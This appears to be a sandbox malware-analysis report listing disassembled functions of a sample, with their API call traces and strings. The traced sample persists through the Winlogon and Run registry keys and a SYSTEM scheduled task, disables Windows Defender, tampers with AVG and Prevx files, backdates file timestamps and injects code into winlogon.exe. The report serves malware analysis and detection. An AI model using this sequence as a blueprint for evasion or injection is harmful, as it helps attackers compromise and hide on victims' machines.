API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$WDEnable$Windows Defender
API String ID: 1010965793-3061216624
Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8

Function 00401DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004013C0: CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
Part of subcall function 004013C0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
Part of subcall function 004013C0: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
Part of subcall function 004013C0: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4

RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
GetTickCount.KERNEL32 ref: 00401E23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
HeapValidate.KERNEL32(00000000), ref: 00401E81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
HeapFree.KERNEL32(00000000), ref: 00401E91

Strings

RtlUniform, xrefs: 00401E3E
ntdll.dll, xrefs: 00401E2F

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 3168189189-3277137149
Opcode ID: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
Opcode Fuzzy Hash: 1044d5b8489757274fbc6076754cecbbd1deaec704c57d239c16298d4a1a6bbf
Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8

Function 00402340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023D6
WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004023F6
GetSystemTimeAsFileTime.KERNEL32(?), ref: 004023FC
WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040241A
CloseHandle.KERNEL32(00000000), ref: 0040241D

Strings

\\.\pipe\acsipc_server, xrefs: 00402365

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: File$TimeWrite$CloseCreateHandleSystem
String ID: \\.\pipe\acsipc_server
API String ID: 3225117150-898603304
Opcode ID: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction ID: 3dcb9c770a9bbc908c19996743ce3c51c52a4f68684fd20990d5167f2ff57074
Opcode Fuzzy Hash: 94b1d67b28c7260292b1a7477ac8e46b5ec02ea568fbb3c68bcd621bbab052b5
Instruction Fuzzy Hash: 9B31E0B1C0121CABDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95

Function 00401130 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401152
memset.MSVCRT ref: 00401171
IsUserAnAdmin.SHELL32 ref: 0040118A
RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
_snprintf.MSVCRT ref: 0040120E
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,7604DB30), ref: 00401275
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8

Strings

SystemDrive, xrefs: 004011CA
userinit, xrefs: 004012AA
software\microsoft\windows\currentversion\run, xrefs: 0040128A
software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 1223198359-2324515132
Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

Function 00402520 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
CloseHandle.KERNEL32(00000000), ref: 00402647

Strings

\PrevxCSI\csidb.csi, xrefs: 0040255A

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9

Function 004013C0 Relevance: 24.1, APIs: 16, Instructions: 133
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
RtlAllocateHeap.NTDLL(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
memset.MSVCRT ref: 0040143D
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
HeapValidate.KERNEL32(00000000), ref: 004014A4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
HeapFree.KERNEL32(00000000), ref: 004014B4
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014D4
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014E5
IsBadWritePtr.KERNEL32(?,00000004,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 004014F5

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
String ID:
API String ID: 213124939-0
Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8

Function 004019B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004019C8
memset.MSVCRT ref: 004019EE
lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,7604DB30,00000000,00000000), ref: 00401A06
CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,7604DB30,00000000,00000000), ref: 00401A29
GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A4A
CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A57
GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A6E
CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A7B

Strings

?+@, xrefs: 004019F3, 00401A69, 00401A45, 004019FE, 00401A48, 00401A6C
D, xrefs: 00401A22

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: ?+@$D
API String ID: 2248944234-1654856090
Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4

Function 00401EA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 76
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
SetFileTime.KERNELBASE(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F

Strings

\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401EC0
*@, xrefs: 00401ED2, 00401F2B, 00401ED5, 00401F2E

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
API String ID: 1046229350-2079472752
Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8

Function 00401520 Relevance: 13.6, APIs: 9, Instructions: 66
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C), ref: 0040154F
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401565
PathFileExistsA.KERNELBASE(?), ref: 00401572
GetTempPathA.KERNELBASE(00000104,?,00000000), ref: 00401589
GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 004015A1
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004015BD
SetFileAttributesA.KERNELBASE(?,00000000), ref: 004015CC
DeleteFileA.KERNELBASE(?), ref: 004015D9
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 004015ED

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction ID: 1f2af84f05926cbb5e0b354959f29bdceae47d8b45da359f5ec46e55e0df53d3
Opcode Fuzzy Hash: 3973d0feee2bd4d46e794484f13dae327776c0d4aca43c2d9e078c91308a651e
Instruction Fuzzy Hash: 3F21FCB1D00219AFDB10DBA0DD49FEA77BCAB48700F0045AAA709F6190EB749B448FA5

Function 004012E0 Relevance: 12.1, APIs: 8, Instructions: 84fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,7604DB30,?,00401E75,00000000), ref: 00401317
SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,00401E75,00000000), ref: 0040132C
LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040133B
WriteFile.KERNELBASE(00000000,?,00000000,00401E75,00000000,?,00401E75,00000000), ref: 0040134D
UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00401E75,00000000), ref: 0040135D
SetEndOfFile.KERNELBASE(00000000), ref: 0040136A
GetHandleInformation.KERNEL32(00000000,00000000), ref: 0040138C
FindCloseChangeNotification.KERNELBASE(00000000), ref: 0040139D

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindHandleInformationLockNotificationPointerUnlockWrite
String ID:
API String ID: 2878253294-0
Opcode ID: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction ID: fc3a19f52fd50960abd89716b3b21a8dc97a86bf959a0b9d512ee5003149b17c
Opcode Fuzzy Hash: 767d19d3de4797b5c71be3d902a88e0ab7c1d0a14529f93e3769efd59d7c6aec
Instruction Fuzzy Hash: 0E21BE71A00204BBF7205B65DD4DFAB7A6CEBC1B51F148126FF00B66E0D7B84E81C6A8

Function 00401AA0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401AC4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401ACF
Process32First.KERNEL32 ref: 00401AF5
StrStrIA.SHLWAPI(?,004010DF), ref: 00401B10
Process32Next.KERNEL32(00000000,?), ref: 00401B1C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B38
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401B4A

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstHandleInformationNextNotificationSnapshotToolhelp32memset
String ID:
API String ID: 3068433855-0
Opcode ID: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction ID: dd63a524005d9bd3fdf31d3318007fe9a0ed814c8c3d3d806708decfbcb8f66e
Opcode Fuzzy Hash: f5034955aae474984994a817a0ed0942b8356643e55c240cad4dcfde9e81f7f8
Instruction Fuzzy Hash: 9611EBB25043105BC310EF55DC48A9BBBACEBD5360F00453AFE55A3290E734E949CBEA

Function 00402430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402448
MoveFileA.KERNEL32(?,?), ref: 0040250F

Strings

\AVG\AVG9\dfmcfg.dat, xrefs: 004024CC
\AVG\AVG9\dfncfg.dat, xrefs: 00402488

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: FileFolderMovePath
String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
API String ID: 1404575960-1083204512
Opcode ID: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction ID: 2817f7f5a2ee45723a7bffe92fbd27ee54b29152b6db55fc9663a9b726faa6ae
Opcode Fuzzy Hash: e53c7f5395ff5d23e1ea87fbe032685214c058210a3022917d0998b022fdd273
Instruction Fuzzy Hash: 172151B45042448FC719CF14EA98B92BBF1BB88300F1581F9DA99A73B2D6B0D944CF98

Function 0040217A Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000), ref: 0040218C

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction ID: d0e749ada70b16f267b0096a5882ad0ed8cb575b22d8ef64c6acb779e6c27845
Opcode Fuzzy Hash: b7cbe1c8c54e898400676a98b1d5ddb11bfceec092903a2200cc263d8e9133b1
Instruction Fuzzy Hash: B6D05E76E05729CBCB20DF94A5052AEF730FB45731F0083AADE247338083351C118AD4

Non-executed Functions

Function 004033B0 Relevance: 66.9, APIs: 32, Strings: 6, Instructions: 368memoryfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004033FE
memset.MSVCRT ref: 0040341E
memset.MSVCRT ref: 0040343E
IsUserAnAdmin.SHELL32 ref: 00403446
GetVersionExA.KERNEL32 ref: 00403461

Part of subcall function 00403310: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 00403337
Part of subcall function 00403310: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403359
Part of subcall function 00403310: OpenProcessToken.ADVAPI32(00000000), ref: 00403360
Part of subcall function 00403310: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403381
Part of subcall function 00403310: CloseHandle.KERNEL32(00000000), ref: 00403397

GetTickCount.KERNEL32 ref: 004034A5
_snwprintf.MSVCRT ref: 004034BE
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7604DB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE

Strings

p=<u, xrefs: 0040379B
\\?\globalroot\systemroot\system32\tasks\, xrefs: 004033E7
<Actions , xrefs: 0040365A
task%d, xrefs: 004034AC
<Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 004033C4
00-->, xrefs: 0040368F

Memory Dump Source

Source File: 00000000.00000002.1658840608.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658840608.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Bonelessness.jbxd

Yara matches

Similarity

API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$p=<u$task%d
API String ID: 1601901853-1711019342
Opcode ID: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction ID: 1b369b621c6b50f993c5cfef2b03b24b37f74764d04c33fe2e8d64a6d5fdefe9
Opcode Fuzzy Hash: 3e75ff0d6558df4951f578cf3538052f2bff9976cb2e3b9c80236ffe9a2ee6c0
Instruction Fuzzy Hash: F8D1C3B1504301ABD720DF64CC49B5B7BE8EFC8715F048A29FA49A72D1E774EA04CB99

Function 00401B70 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401FB0: memset.MSVCRT ref: 00401FD6
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
Part of subcall function 00401FB0: GetLastError.KERNEL32 ref: 00401FF0
Part of subcall function 00401FB0: SwitchToThread.KERNEL32 ref: 00401FFF
Part of subcall function 00401FB0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
Part of subcall function 00401FB0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
Part of subcall function 00401FB0: CloseHandle.KERNEL32(00000000), ref: 00402039

Sleep.KERNEL32(00000064,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401B9D
OpenProcess.KERNEL32(001F0FFF,00000000,00000000,7604DB30,?,00000000,00402DB4,winlogon.exe), ref: 00401BBC
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401BDB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401BF1
GetCurrentProcess.KERNEL32(00000000), ref: 00401BFD
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401C18
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401C28
VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 00401C6F
WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401C91
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00401CBD
memcpy.MSVCRT ref: 00401CD8
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 00401CF3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401D01
WriteProcessMemory.KERNEL32(00000000,?,00406400,00052A00,?), ref: 00401D34
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401D44
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401D56
GetHandleInformation.KERNEL32(00000000), ref: 00401D6E
CloseHandle.KERNEL32(00000000), ref: 00401D7F
